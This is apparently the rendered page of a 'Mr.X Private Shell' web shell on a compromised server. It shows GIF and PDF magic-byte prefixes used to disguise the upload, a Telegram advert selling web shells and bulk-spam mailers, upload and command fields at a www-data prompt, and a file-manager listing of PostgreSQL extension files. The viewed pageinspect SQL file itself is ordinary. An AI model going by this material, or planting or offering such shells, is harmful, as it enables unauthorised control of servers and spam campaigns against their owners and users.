GIF89; GIF89; %PDF- %PDF- Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.129: ~ $
/* contrib/pageinspect/pageinspect--1.5.sql */

-- complain if script is sourced in psql, rather than via CREATE EXTENSION
\echo Use "CREATE EXTENSION pageinspect" to load this file. \quit

--
-- get_raw_page()
--
CREATE FUNCTION get_raw_page(text, int4)
RETURNS bytea
AS 'MODULE_PATHNAME', 'get_raw_page'
LANGUAGE C STRICT PARALLEL SAFE;

CREATE FUNCTION get_raw_page(text, text, int4)
RETURNS bytea
AS 'MODULE_PATHNAME', 'get_raw_page_fork'
LANGUAGE C STRICT PARALLEL SAFE;

--
-- page_header()
--
CREATE FUNCTION page_header(IN page bytea,
    OUT lsn pg_lsn,
    OUT checksum smallint,
    OUT flags smallint,
    OUT lower smallint,
    OUT upper smallint,
    OUT special smallint,
    OUT pagesize smallint,
    OUT version smallint,
    OUT prune_xid xid)
AS 'MODULE_PATHNAME', 'page_header'
LANGUAGE C STRICT PARALLEL SAFE;

--
-- heap_page_items()
--
CREATE FUNCTION heap_page_items(IN page bytea,
    OUT lp smallint,
    OUT lp_off smallint,
    OUT lp_flags smallint,
    OUT lp_len smallint,
    OUT t_xmin xid,
    OUT t_xmax xid,
    OUT t_field3 int4,
    OUT t_ctid tid,
    OUT t_infomask2 integer,
    OUT t_infomask integer,
    OUT t_hoff smallint,
    OUT t_bits text,
    OUT t_oid oid,
    OUT t_data bytea)
RETURNS SETOF record
AS 'MODULE_PATHNAME', 'heap_page_items'
LANGUAGE C STRICT PARALLEL SAFE;

--
-- tuple_data_split()
--
CREATE FUNCTION tuple_data_split(rel_oid oid,
    t_data bytea,
    t_infomask integer,
    t_infomask2 integer,
    t_bits text)
RETURNS bytea[]
AS 'MODULE_PATHNAME','tuple_data_split'
LANGUAGE C PARALLEL SAFE;

CREATE FUNCTION tuple_data_split(rel_oid oid,
    t_data bytea,
    t_infomask integer,
    t_infomask2 integer,
    t_bits text,
    do_detoast bool)
RETURNS bytea[]
AS 'MODULE_PATHNAME','tuple_data_split'
LANGUAGE C PARALLEL SAFE;

--
-- heap_page_item_attrs()
--
CREATE FUNCTION heap_page_item_attrs(
    IN page bytea,
    IN rel_oid regclass,
    IN do_detoast bool,
    OUT lp smallint,
    OUT lp_off smallint,
    OUT lp_flags smallint,
    OUT lp_len smallint,
    OUT t_xmin xid,
    OUT t_xmax xid,
    OUT t_field3 int4,
    OUT t_ctid tid,
    OUT t_infomask2 integer,
    OUT t_infomask integer,
    OUT t_hoff smallint,
    OUT t_bits text,
    OUT t_oid oid,
    OUT t_attrs bytea[]
    )
RETURNS SETOF record AS $$
SELECT lp,
       lp_off,
       lp_flags,
       lp_len,
       t_xmin,
       t_xmax,
       t_field3,
       t_ctid,
       t_infomask2,
       t_infomask,
       t_hoff,
       t_bits,
       t_oid,
       tuple_data_split(
         rel_oid,
         t_data,
         t_infomask,
         t_infomask2,
         t_bits,
         do_detoast)
         AS t_attrs
  FROM heap_page_items(page);
$$ LANGUAGE SQL PARALLEL SAFE;

CREATE FUNCTION heap_page_item_attrs(IN page bytea, IN rel_oid regclass,
    OUT lp smallint,
    OUT lp_off smallint,
    OUT lp_flags smallint,
    OUT lp_len smallint,
    OUT t_xmin xid,
    OUT t_xmax xid,
    OUT t_field3 int4,
    OUT t_ctid tid,
    OUT t_infomask2 integer,
    OUT t_infomask integer,
    OUT t_hoff smallint,
    OUT t_bits text,
    OUT t_oid oid,
    OUT t_attrs bytea[]
    )
RETURNS SETOF record AS $$
SELECT * from heap_page_item_attrs(page, rel_oid, false);
$$ LANGUAGE SQL PARALLEL SAFE;

--
-- bt_metap()
--
CREATE FUNCTION bt_metap(IN relname text,
    OUT magic int4,
    OUT version int4,
    OUT root int4,
    OUT level int4,
    OUT fastroot int4,
    OUT fastlevel int4)
AS 'MODULE_PATHNAME', 'bt_metap'
LANGUAGE C STRICT PARALLEL SAFE;

--
-- bt_page_stats()
--
CREATE FUNCTION bt_page_stats(IN relname text, IN blkno int4,
    OUT blkno int4,
    OUT type "char",
    OUT live_items int4,
    OUT dead_items int4,
    OUT avg_item_size int4,
    OUT page_size int4,
    OUT free_size int4,
    OUT btpo_prev int4,
    OUT btpo_next int4,
    OUT btpo int4,
    OUT btpo_flags int4)
AS 'MODULE_PATHNAME', 'bt_page_stats'
LANGUAGE C STRICT PARALLEL SAFE;

--
-- bt_page_items()
--
CREATE FUNCTION bt_page_items(IN relname text, IN blkno int4,
    OUT itemoffset smallint,
    OUT ctid tid,
    OUT itemlen smallint,
    OUT nulls bool,
    OUT vars bool,
    OUT data text)
RETURNS SETOF record
AS 'MODULE_PATHNAME', 'bt_page_items'
LANGUAGE C STRICT PARALLEL SAFE;

--
-- brin_page_type()
--
CREATE FUNCTION brin_page_type(IN page bytea)
RETURNS text
AS 'MODULE_PATHNAME', 'brin_page_type'
LANGUAGE C STRICT PARALLEL SAFE;

--
-- brin_metapage_info()
--
CREATE FUNCTION brin_metapage_info(IN page bytea, OUT magic text,
	OUT version integer, OUT pagesperrange integer, OUT lastrevmappage bigint)
AS 'MODULE_PATHNAME', 'brin_metapage_info'
LANGUAGE C STRICT PARALLEL SAFE;

--
-- brin_revmap_data()
--
CREATE FUNCTION brin_revmap_data(IN page bytea,
	OUT pages tid)
RETURNS SETOF tid
AS 'MODULE_PATHNAME', 'brin_revmap_data'
LANGUAGE C STRICT PARALLEL SAFE;

--
-- brin_page_items()
--
CREATE FUNCTION brin_page_items(IN page bytea, IN index_oid regclass,
	OUT itemoffset int,
	OUT blknum int,
	OUT attnum int,
	OUT allnulls bool,
	OUT hasnulls bool,
	OUT placeholder bool,
	OUT value text)
RETURNS SETOF record
AS 'MODULE_PATHNAME', 'brin_page_items'
LANGUAGE C STRICT PARALLEL SAFE;

--
-- fsm_page_contents()
--
CREATE FUNCTION fsm_page_contents(IN page bytea)
RETURNS text
AS 'MODULE_PATHNAME', 'fsm_page_contents'
LANGUAGE C STRICT PARALLEL SAFE;

--
-- GIN functions
--

--
-- gin_metapage_info()
--
CREATE FUNCTION gin_metapage_info(IN page bytea,
    OUT pending_head bigint,
    OUT pending_tail bigint,
    OUT tail_free_size int4,
    OUT n_pending_pages bigint,
    OUT n_pending_tuples bigint,
    OUT n_total_pages bigint,
    OUT n_entry_pages bigint,
    OUT n_data_pages bigint,
    OUT n_entries bigint,
    OUT version int4)
AS 'MODULE_PATHNAME', 'gin_metapage_info'
LANGUAGE C STRICT PARALLEL SAFE;

--
-- gin_page_opaque_info()
--
CREATE FUNCTION gin_page_opaque_info(IN page bytea,
    OUT rightlink bigint,
    OUT maxoff int4,
    OUT flags text[])
AS 'MODULE_PATHNAME', 'gin_page_opaque_info'
LANGUAGE C STRICT PARALLEL SAFE;

--
-- gin_leafpage_items()
--
CREATE FUNCTION gin_leafpage_items(IN page bytea,
    OUT first_tid tid,
    OUT nbytes int2,
    OUT tids tid[])
RETURNS SETOF record
AS 'MODULE_PATHNAME', 'gin_leafpage_items'
LANGUAGE C STRICT PARALLEL SAFE;

Filemanager

Name Type Size Permission Actions
adminpack--1.0--1.1.sql File 274 B 0644
adminpack--1.0.sql File 1.5 KB 0644
adminpack--1.1--2.0.sql File 1.64 KB 0644
adminpack--2.0--2.1.sql File 595 B 0644
adminpack.control File 176 B 0644
amcheck--1.0--1.1.sql File 931 B 0644
amcheck--1.0.sql File 704 B 0644
amcheck--1.1--1.2.sql File 705 B 0644
amcheck--1.2--1.3.sql File 852 B 0644
amcheck.control File 154 B 0644
autoinc--1.0.sql File 249 B 0644
autoinc.control File 149 B 0644
bloom--1.0.sql File 666 B 0644
bloom.control File 156 B 0644
btree_gin--1.0--1.1.sql File 1.34 KB 0644
btree_gin--1.0.sql File 24.24 KB 0644
btree_gin--1.1--1.2.sql File 1.41 KB 0644
btree_gin--1.2--1.3.sql File 4.46 KB 0644
btree_gin.control File 175 B 0644
btree_gist--1.0--1.1.sql File 3.65 KB 0644
btree_gist--1.1--1.2.sql File 4.93 KB 0644
btree_gist--1.2--1.3.sql File 1.91 KB 0644
btree_gist--1.2.sql File 40.15 KB 0644
btree_gist--1.3--1.4.sql File 1.89 KB 0644
btree_gist--1.4--1.5.sql File 1.83 KB 0644
btree_gist--1.5--1.6.sql File 13.1 KB 0644
btree_gist.control File 178 B 0644
citext--1.0--1.1.sql File 1 KB 0644
citext--1.1--1.2.sql File 3.34 KB 0644
citext--1.2--1.3.sql File 850 B 0644
citext--1.3--1.4.sql File 668 B 0644
citext--1.4--1.5.sql File 2.23 KB 0644
citext--1.4.sql File 13.15 KB 0644
citext--1.5--1.6.sql File 427 B 0644
citext.control File 173 B 0644
cube--1.0--1.1.sql File 1.56 KB 0644
cube--1.1--1.2.sql File 3.73 KB 0644
cube--1.2--1.3.sql File 365 B 0644
cube--1.2.sql File 9.53 KB 0644
cube--1.3--1.4.sql File 2.33 KB 0644
cube--1.4--1.5.sql File 591 B 0644
cube.control File 157 B 0644
dblink--1.0--1.1.sql File 419 B 0644
dblink--1.1--1.2.sql File 2.77 KB 0644
dblink--1.2.sql File 6.49 KB 0644
dblink.control File 170 B 0644
dict_int--1.0.sql File 711 B 0644
dict_int.control File 173 B 0644
dict_xsyn--1.0.sql File 694 B 0644
dict_xsyn.control File 179 B 0644
earthdistance--1.0--1.1.sql File 671 B 0644
earthdistance--1.1.sql File 3.16 KB 0644
earthdistance.control File 202 B 0644
file_fdw--1.0.sql File 475 B 0644
file_fdw.control File 155 B 0644
fuzzystrmatch--1.0--1.1.sql File 788 B 0644
fuzzystrmatch--1.1.sql File 1.54 KB 0644
fuzzystrmatch.control File 190 B 0644
hstore--1.1--1.2.sql File 1.6 KB 0644
hstore--1.2--1.3.sql File 525 B 0644
hstore--1.3--1.4.sql File 5.19 KB 0644
hstore--1.4--1.5.sql File 409 B 0644
hstore--1.4.sql File 13.44 KB 0644
hstore--1.5--1.6.sql File 455 B 0644
hstore--1.6--1.7.sql File 1.04 KB 0644
hstore--1.7--1.8.sql File 508 B 0644
hstore.control File 173 B 0644
insert_username--1.0.sql File 273 B 0644
insert_username.control File 170 B 0644
intagg--1.0--1.1.sql File 897 B 0644
intagg--1.1.sql File 1.06 KB 0644
intagg.control File 119 B 0644
intarray--1.0--1.1.sql File 1.75 KB 0644
intarray--1.1--1.2.sql File 5.4 KB 0644
intarray--1.2--1.3.sql File 663 B 0644
intarray--1.2.sql File 12 KB 0644
intarray--1.3--1.4.sql File 692 B 0644
intarray--1.4--1.5.sql File 282 B 0644
intarray.control File 191 B 0644
isn--1.0--1.1.sql File 12.04 KB 0644
isn--1.1--1.2.sql File 5.14 KB 0644
isn--1.1.sql File 68.25 KB 0644
isn.control File 175 B 0644
lo--1.0--1.1.sql File 223 B 0644
lo--1.1.sql File 722 B 0644
lo.control File 141 B 0644
ltree--1.0--1.1.sql File 6.19 KB 0644
ltree--1.1--1.2.sql File 5.09 KB 0644
ltree--1.1.sql File 18.92 KB 0644
ltree.control File 170 B 0644
moddatetime--1.0.sql File 261 B 0644
moddatetime.control File 165 B 0644
old_snapshot--1.0.sql File 549 B 0644
old_snapshot.control File 168 B 0644
pageinspect--1.0--1.1.sql File 560 B 0644
pageinspect--1.1--1.2.sql File 562 B 0644
pageinspect--1.2--1.3.sql File 1.9 KB 0644
pageinspect--1.3--1.4.sql File 2.51 KB 0644
pageinspect--1.4--1.5.sql File 1.32 KB 0644
pageinspect--1.5--1.6.sql File 2.2 KB 0644
pageinspect--1.5.sql File 6.12 KB 0644
pageinspect--1.6--1.7.sql File 698 B 0644
pageinspect--1.7--1.8.sql File 1.67 KB 0644
pageinspect--1.8--1.9.sql File 3.32 KB 0644
pageinspect.control File 173 B 0644
pg_buffercache--1.0--1.1.sql File 508 B 0644
pg_buffercache--1.1--1.2.sql File 271 B 0644
pg_buffercache--1.2--1.3.sql File 328 B 0644
pg_buffercache--1.2.sql File 794 B 0644
pg_buffercache.control File 157 B 0644
pg_freespacemap--1.0--1.1.sql File 335 B 0644
pg_freespacemap--1.1--1.2.sql File 377 B 0644
pg_freespacemap--1.1.sql File 899 B 0644
pg_freespacemap.control File 160 B 0644
pg_prewarm--1.0--1.1.sql File 281 B 0644
pg_prewarm--1.1--1.2.sql File 458 B 0644
pg_prewarm--1.1.sql File 475 B 0644
pg_prewarm.control File 139 B 0644
pg_stat_statements--1.0--1.1.sql File 1.22 KB 0644
pg_stat_statements--1.1--1.2.sql File 1.3 KB 0644
pg_stat_statements--1.2--1.3.sql File 1.42 KB 0644
pg_stat_statements--1.3--1.4.sql File 345 B 0644
pg_stat_statements--1.4--1.5.sql File 305 B 0644
pg_stat_statements--1.4.sql File 1.39 KB 0644
pg_stat_statements--1.5--1.6.sql File 376 B 0644
pg_stat_statements--1.6--1.7.sql File 806 B 0644
pg_stat_statements--1.7--1.8.sql File 1.7 KB 0644
pg_stat_statements--1.8--1.9.sql File 2.08 KB 0644
pg_stat_statements.control File 204 B 0644
pg_surgery--1.0.sql File 608 B 0644
pg_surgery.control File 168 B 0644
pg_trgm--1.0--1.1.sql File 536 B 0644
pg_trgm--1.1--1.2.sql File 2.14 KB 0644
pg_trgm--1.2--1.3.sql File 3.42 KB 0644
pg_trgm--1.3--1.4.sql File 2 KB 0644
pg_trgm--1.3.sql File 7.76 KB 0644
pg_trgm--1.4--1.5.sql File 858 B 0644
pg_trgm--1.5--1.6.sql File 418 B 0644
pg_trgm.control File 192 B 0644
pg_visibility--1.0--1.1.sql File 883 B 0644
pg_visibility--1.1--1.2.sql File 833 B 0644
pg_visibility--1.1.sql File 2.76 KB 0644
pg_visibility.control File 186 B 0644
pgcrypto--1.0--1.1.sql File 307 B 0644
pgcrypto--1.1--1.2.sql File 483 B 0644
pgcrypto--1.2--1.3.sql File 2.29 KB 0644
pgcrypto--1.3.sql File 5.57 KB 0644
pgcrypto.control File 152 B 0644
pgrowlocks--1.0--1.1.sql File 651 B 0644
pgrowlocks--1.1--1.2.sql File 253 B 0644
pgrowlocks--1.2.sql File 555 B 0644
pgrowlocks.control File 152 B 0644
pgstattuple--1.0--1.1.sql File 400 B 0644
pgstattuple--1.1--1.2.sql File 1.4 KB 0644
pgstattuple--1.2--1.3.sql File 1.1 KB 0644
pgstattuple--1.3--1.4.sql File 623 B 0644
pgstattuple--1.4--1.5.sql File 5.38 KB 0644
pgstattuple--1.4.sql File 3.68 KB 0644
pgstattuple.control File 147 B 0644
plpgsql--1.0.sql File 658 B 0644
plpgsql.control File 193 B 0644
postgres_fdw--1.0--1.1.sql File 626 B 0644
postgres_fdw--1.0.sql File 507 B 0644
postgres_fdw.control File 172 B 0644
refint--1.0.sql File 343 B 0644
refint.control File 169 B 0644
seg--1.0--1.1.sql File 2.93 KB 0644
seg--1.1--1.2.sql File 360 B 0644
seg--1.1.sql File 7.95 KB 0644
seg--1.2--1.3.sql File 2.29 KB 0644
seg--1.3--1.4.sql File 259 B 0644
seg.control File 187 B 0644
sslinfo--1.0--1.1.sql File 375 B 0644
sslinfo--1.1--1.2.sql File 746 B 0644
sslinfo--1.2.sql File 1.5 KB 0644
sslinfo.control File 146 B 0644
tablefunc--1.0.sql File 2.1 KB 0644
tablefunc.control File 189 B 0644
tcn--1.0.sql File 274 B 0644
tcn.control File 149 B 0644
tsm_system_rows--1.0.sql File 327 B 0644
tsm_system_rows.control File 201 B 0644
tsm_system_time--1.0.sql File 327 B 0644
tsm_system_time.control File 207 B 0644
unaccent--1.0--1.1.sql File 445 B 0644
unaccent--1.1.sql File 910 B 0644
unaccent.control File 172 B 0644
uuid-ossp--1.0--1.1.sql File 688 B 0644
uuid-ossp--1.1.sql File 1.48 KB 0644
uuid-ossp.control File 178 B 0644
xml2--1.0--1.1.sql File 944 B 0644
xml2--1.1.sql File 2 KB 0644
xml2.control File 182 B 0644